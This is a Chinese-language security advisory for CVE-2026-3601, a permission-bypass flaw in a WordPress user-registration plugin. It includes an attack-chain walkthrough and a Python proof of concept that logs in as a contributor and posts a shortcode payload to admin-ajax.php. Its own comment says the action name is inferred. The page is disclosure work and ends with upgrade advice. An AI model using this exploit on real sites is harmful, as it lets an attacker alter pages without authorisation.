CVE-2026-3601 CVSS 4.3 中危

CVE-2026-3601: WordPress用户注册插件权限绕过漏洞

披露日期: 2026-05-05

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-3601

漏洞类型

权限绕过

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WordPress User Registration & Membership 插件

漏洞概述

WordPress的User Registration & Membership插件在5.1.4及之前版本中存在安全漏洞。该漏洞源于`embed_form_action()`函数缺少能力检查，导致未经授权的数据修改风险。拥有贡献者及以上权限的认证攻击者可以利用此漏洞，向其不拥有或无权编辑的任意页面追加短代码内容。尽管CVSS评分为中等，但结合WordPress的普及率，该漏洞仍需引起重视，尤其是允许用户注册的站点。

技术细节

该漏洞的核心技术缺陷位于WordPress插件`User Registration & Membership`的`class-ur-ajax.php`文件中的`embed_form_action()`函数。在WordPress的权限体系中，对页面进行编辑操作应当严格验证用户是否具备相应的`edit_posts`或`edit_others_posts`能力。然而，该插件在处理通过AJAX发起的表单嵌入请求时，仅验证了基本的登录状态或低级别的角色权限，却遗漏了对目标页面所有权的校验。攻击者可以注册为一个低权限（如贡献者）账户，利用该缺陷，绕过WordPress原生的访问控制机制。通过构造特定的POST请求发送至`admin-ajax.php`，并在参数中指定任意页面的ID以及恶意的Shortcode（短代码）内容。服务器端的漏洞函数会直接处理该请求，将攻击者的数据追加写入到指定页面的数据库记录中。这种利用方式无需管理员交互，且由于是后台请求，隐蔽性较强，最终导致页面内容被非授权篡改。

攻击链分析

STEP 1

信息收集

攻击者识别目标网站是否安装了User Registration & Membership插件，并确认其版本在5.1.4及以下。

STEP 2

获取权限

攻击者在目标站点注册一个账户，或利用现有的低权限（如贡献者Contributor）账户凭证。

STEP 3

发送恶意请求

攻击者利用该账户登录，向`/wp-admin/admin-ajax.php`发送特制的POST请求，调用`ur_embed_form`动作，并在参数中指定目标页面ID和恶意短代码。

STEP 4

执行攻击

服务器端由于缺少权限校验，将恶意内容追加到指定页面中，攻击者完成对未授权页面的内容篡改。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_url = "http://example.com/wp-admin/admin-ajax.php"
username = "contributor_user"
password = "password123"
target_post_id = "1"  # ID of the page to modify

# Login to get session and nonce (if applicable)
session = requests.Session()
login_data = {
    'log': username,
    'pwd': password,
    'redirect_to': '/wp-admin/',
    'wp-submit': 'Log In'
}
session.post("http://example.com/wp-login.php", data=login_data)

# Exploit payload
# The action 'ur_embed_form' is inferred from the function name 'embed_form_action'
payload = {
    'action': 'ur_embed_form',
    'post_id': target_post_id,
    'form_id': '1',
    'shortcode_content': '[malicious_shortcode]alert(1)[/malicious_shortcode]'
}

# Send exploit request
response = session.post(target_url, data=payload)

if response.status_code == 200:
    print("[+] Payload sent successfully.")
    print(f"[+] Response: {response.text}")
else:
    print("[-] Failed to send payload.")

影响范围

User Registration & Membership <= 5.1.4

防御指南

临时缓解措施

建议立即将插件升级到最新版本以修补漏洞。如果暂时无法升级，应禁用用户注册功能，或撤销贡献者角色用户的权限，直到完成更新。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表